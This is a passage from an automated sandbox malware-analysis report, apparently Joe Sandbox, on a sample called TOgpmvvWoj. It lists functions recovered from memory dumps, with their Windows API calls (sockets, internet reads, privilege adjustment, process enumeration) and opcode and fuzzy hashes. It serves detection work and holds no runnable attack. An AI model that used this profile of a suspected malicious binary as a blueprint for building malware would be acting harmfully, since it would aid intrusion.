                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf
                                            • String ID: Oa
                                            • API String ID: 674341424-3945284152
                                            • Opcode ID: c7876da7165bdb38aa4887edbdd66f39e9c968c000728e42198f30a1346f0529
                                            • Instruction ID: 5bf8d37cc6d7b50958c3a945c4a1cf53f3493b86a69a5b2fea9097588cffdff2
                                            • Opcode Fuzzy Hash: c7876da7165bdb38aa4887edbdd66f39e9c968c000728e42198f30a1346f0529
                                            • Instruction Fuzzy Hash: 3A22AE716083119FC724DF24E891BAFB7E5BF84304F10691DF89AA7291DB74EA44CB92
                                            Function 00E86596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E865EF
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E865FE
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00E8661A
                                            • listen.WSOCK32(00000000,00000005), ref: 00E86629
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86643
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00E86657
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                            • String ID:
                                            • API String ID: 1279440585-0
                                            • Opcode ID: 3915db729337f8e2d8dcd78a947de7614e95bb13a2476031fa2b46cb3f081805
                                            • Instruction ID: 8853852b236971f5d7b213413372a0739fcbfd4125fbe791004c062958b700ee
                                            • Opcode Fuzzy Hash: 3915db729337f8e2d8dcd78a947de7614e95bb13a2476031fa2b46cb3f081805
                                            • Instruction Fuzzy Hash: 6221D0316002009FCB10EF64C949BAEB7E9EF48324F14915AE95AF73D2DB30AD44DB50
                                            Function 00E11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E119FA
                                            • GetSysColor.USER32(0000000F), ref: 00E11A4E
                                            • SetBkColor.GDI32(?,00000000), ref: 00E11A61
                                              • Part of subcall function 00E11290: DefDlgProcW.USER32(?,00000020,?), ref: 00E112D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ColorProc$LongWindow
                                            • String ID:
                                            • API String ID: 3744519093-0
                                            • Opcode ID: 8d33aec88f33da48e61c833bef208ab9cbed01b8f836d03942a2adf05c858b5a
                                            • Instruction ID: 469fdf05e1f606cccb03624e701b2b1905c3fa61abbb43b84018b0efcb537e06
                                            • Opcode Fuzzy Hash: 8d33aec88f33da48e61c833bef208ab9cbed01b8f836d03942a2adf05c858b5a
                                            • Instruction Fuzzy Hash: 73A15B71106584BEDB38AB29AC85DFF3E9DDF81349B24315EF602F6192CE14DD8192B2
                                            Function 00E86A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E86AB1
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86ADA
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00E86B13
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86B20
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00E86B34
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                            • String ID:
                                            • API String ID: 99427753-0
                                            • Opcode ID: 197163c9601c3890e1cb1ab0e6403b0753ef40de38bdaee8a9cd06bc7d371f0d
                                            • Instruction ID: 458416653a0c3dfd29107ce1e0fc373dc8a7d444a58d9ed73d8db1318c305e2a
                                            • Opcode Fuzzy Hash: 197163c9601c3890e1cb1ab0e6403b0753ef40de38bdaee8a9cd06bc7d371f0d
                                            • Instruction Fuzzy Hash: 6141EE75A40210AFEB10BF649C96FAE77E9AF48720F049059F90ABB2C3CA709D408791
                                            Function 00E955FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                            • String ID:
                                            • API String ID: 292994002-0
                                            • Opcode ID: 05cda98f94825cf76ef39e725da6c5fea01cd94ec92e0dfd8553a3cbb7540b7a
                                            • Instruction ID: 1a6082b9f7a814000ebe76dc9e03a9bcc0028ab0786e5a45af0f648ad05c7cab
                                            • Opcode Fuzzy Hash: 05cda98f94825cf76ef39e725da6c5fea01cd94ec92e0dfd8553a3cbb7540b7a
                                            • Instruction Fuzzy Hash: F511C432300A106FEB221F26DC54A6F7799EF84721B45542AF846F7242CB709D42CBA5
                                            Function 00E8C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E51D88,?), ref: 00E8C312
                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E8C324
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                            • API String ID: 2574300362-1816364905
                                            • Opcode ID: fda50cba2f1b938431027958e6d187bb5202b41bfac2608ead694339c4404584
                                            • Instruction ID: 72a0c29f2a5ea1b1cb9f1836fa856b667a405d70624b4d7dc58c30df04b7f362
                                            • Opcode Fuzzy Hash: fda50cba2f1b938431027958e6d187bb5202b41bfac2608ead694339c4404584
                                            • Instruction Fuzzy Hash: 95E0E674601713DFDB205F26D805A4676D4EF09759B50D47AE45DF2160E770D442C760
                                            Function 00E8F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00E8F151
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00E8F15F
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • Process32NextW.KERNEL32(00000000,?), ref: 00E8F21F
                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E8F22E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                            • String ID:
                                            • API String ID: 2576544623-0
                                            • Opcode ID: f9b2042a243a0e52494562dda1cf4d6e59fa9d4fe1404f32e57aac5cfe4d3410
                                            • Instruction ID: 4623ca49e31e4f117797706e6a4334f7f6608ee8548b6f04af18051d21736846
                                            • Opcode Fuzzy Hash: f9b2042a243a0e52494562dda1cf4d6e59fa9d4fe1404f32e57aac5cfe4d3410
                                            • Instruction Fuzzy Hash: 695161715043119FD310EF24DC95EABB7E8FF94710F50582DF499A72A2DB709948CB92
                                            Function 00E740B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E740D1
                                            • _memset.LIBCMT ref: 00E740F2
                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E74144
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7414D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                            • String ID:
                                            • API String ID: 1157408455-0
                                            • Opcode ID: 65824ded686817a2262f89ad1bd7832142bd9ce6acaca2c083e4cc8c47c3dcd8
                                            • Instruction ID: 1566e09d9fc38fbb062e214173e9f0a3d11fa8e3a1781576b06800c03cb1666e
                                            • Opcode Fuzzy Hash: 65824ded686817a2262f89ad1bd7832142bd9ce6acaca2c083e4cc8c47c3dcd8
                                            • Instruction Fuzzy Hash: 8211EB759012287AD7309BA59C4DFABBB7CEF44760F104196F908E7180D6744E84CBA4
                                            Function 00E6EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E6EB19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: ($|
                                            • API String ID: 1659193697-1631851259
                                            • Opcode ID: 4282e041317077a3846160299d1f5328f734ca8b1eace79dc8fc8f4b51db6270
                                            • Instruction ID: 53a6fc17b3bbe46777cb111c9e5f1f334807f0f4d6046e7f6acb7728d7c77cfd
                                            • Opcode Fuzzy Hash: 4282e041317077a3846160299d1f5328f734ca8b1eace79dc8fc8f4b51db6270
                                            • Instruction Fuzzy Hash: 29323675A406059FCB28CF19D481A6AB7F1FF48350B15D46EE89AEB3A2D770E941CB40
                                            Function 00E825E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E826D5
                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E8270C
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Internet$AvailableDataFileQueryRead
                                            • String ID:
                                            • API String ID: 599397726-0
                                            • Opcode ID: efcfb8f96311e95afab5b40c9b85056ef32eddb72b6e3311bdfcce0d200dbdad
                                            • Instruction ID: 76f9248451897bc8537736d35b05eb97786aca4c8b33bdf0d507b8bebcee7fcf
                                            • Opcode Fuzzy Hash: efcfb8f96311e95afab5b40c9b85056ef32eddb72b6e3311bdfcce0d200dbdad
                                            • Instruction Fuzzy Hash: 8641A275900209BFEB20AA95DC85EBBB7FCEB40768F10506FF70DB6140EA719E41A754
                                            Function 00E7B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7B5AE
                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E7B608
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E7B655
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1682464887-0
                                            • Opcode ID: 633f6400ec26fa0e993d2bc8d2a8f9b3f203ef1e2e0df569bead8416c8b9beaf
                                            • Instruction ID: 63b49ec39274ee996c9303ab25e973fe5b9594f19358d4774c84deb164c4102a
                                            • Opcode Fuzzy Hash: 633f6400ec26fa0e993d2bc8d2a8f9b3f203ef1e2e0df569bead8416c8b9beaf
                                            • Instruction Fuzzy Hash: 36215E35A00118EFCB00EFA5D880AEDBBF8FF48310F1480AAE945EB352DB319956CB51
                                            Function 00E68CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                            • GetLastError.KERNEL32 ref: 00E68D47
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                            • String ID:
                                            • API String ID: 1922334811-0
                                            • Opcode ID: bafb6e383f1bf881212d84a3109af0bb2d9aa9bf4e5ff81c6d0b8723b6201bbc
                                            • Instruction ID: 146750c00415991acbaf122d4162414b67f30bd7ae9f3ab5c15d6adece105e42
                                            • Opcode Fuzzy Hash: bafb6e383f1bf881212d84a3109af0bb2d9aa9bf4e5ff81c6d0b8723b6201bbc
                                            • Instruction Fuzzy Hash: BD118FB1514209AFD728DF54ED85D6BBBFCEF44750B20962EF856A3241EF70AC40CA60
                                            Function 00E74C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E74C2C
                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E74C43
                                            • FreeSid.ADVAPI32(?), ref: 00E74C53
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                            • String ID:
                                            • API String ID: 3429775523-0
                                            • Opcode ID: 1054c5edb40f065a6c35001b06199bf50c6cb86d7263aa9b9859020d61505396
                                            • Instruction ID: f7c1dfc21d2443e5c101516893c7769549e2b217f1f78bdc3f32bfc7ee6bc346
                                            • Opcode Fuzzy Hash: 1054c5edb40f065a6c35001b06199bf50c6cb86d7263aa9b9859020d61505396
                                            • Instruction Fuzzy Hash: 6BF04975A1130CBFDF04DFF1DC89AAEBBBCEF08201F1044AAE901E2181E7706A089B50
                                            Function 00E78B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            • __time64.LIBCMT ref: 00E78B25
                                              • Part of subcall function 00E3543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E791F8,00000000,?,?,?,?,00E793A9,00000000,?), ref: 00E35443
                                              • Part of subcall function 00E3543A: __aulldiv.LIBCMT ref: 00E35463
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Time$FileSystem__aulldiv__time64
                                            • String ID: 0u
                                            • API String ID: 2893107130-1339160046
                                            • Opcode ID: b2dfaa5d52b9fc568cc469f55d64f79c594c879f76337972dbfcd4fc4a42b747
                                            • Instruction ID: f1a76a7fcbf0f4904a83902998c46a8be6968038d60bad46db07dd229fcbc0ad
                                            • Opcode Fuzzy Hash: b2dfaa5d52b9fc568cc469f55d64f79c594c879f76337972dbfcd4fc4a42b747
                                            • Instruction Fuzzy Hash: 9421E4726355108FC329CF25E441A52B3E1EBB4321B289E6DD4F9DB2D0DA34B905CB94
                                            Function 00E1E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93cc106ae4570a5ebca68f5c789139b26416e694d429f455b90613405c4c3092
                                            • Instruction ID: 9a004d095bc52b72fac4db32de083323b9b2f2df246c749e7848c890f95a154c
                                            • Opcode Fuzzy Hash: 93cc106ae4570a5ebca68f5c789139b26416e694d429f455b90613405c4c3092
                                            • Instruction Fuzzy Hash: 27228874A00216DFDB24DF64C494AEABBF1FF08304F14A469EC66BB351E734A985CB91
                                            Function 00E7C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E7C966
                                            • FindClose.KERNEL32(00000000), ref: 00E7C996
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: a656365b9e4d92b6aa867a967ac1ba536f0b15aa6df3caf0e383361994199697
                                            • Instruction ID: b8737e4e137019ce1fc083295b7d65ab8abeb163806b9f9ebdc094e2c9ebd5e6
                                            • Opcode Fuzzy Hash: a656365b9e4d92b6aa867a967ac1ba536f0b15aa6df3caf0e383361994199697
                                            • Instruction Fuzzy Hash: C01184726106009FD710EF29D855A6AF7E9FF84324F14C51EF9AAE72A1DB34AC04CB81
                                            Function 00E7A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E8977D,?,00E9FB84,?), ref: 00E7A302
                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E8977D,?,00E9FB84,?), ref: 00E7A314
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            • String ID:
                                            • API String ID: 3479602957-0
                                            • Opcode ID: f8c63b4a49be3e95fd15b5058fc2ef867566dcf9a48d11927ce7ed165039ba3b
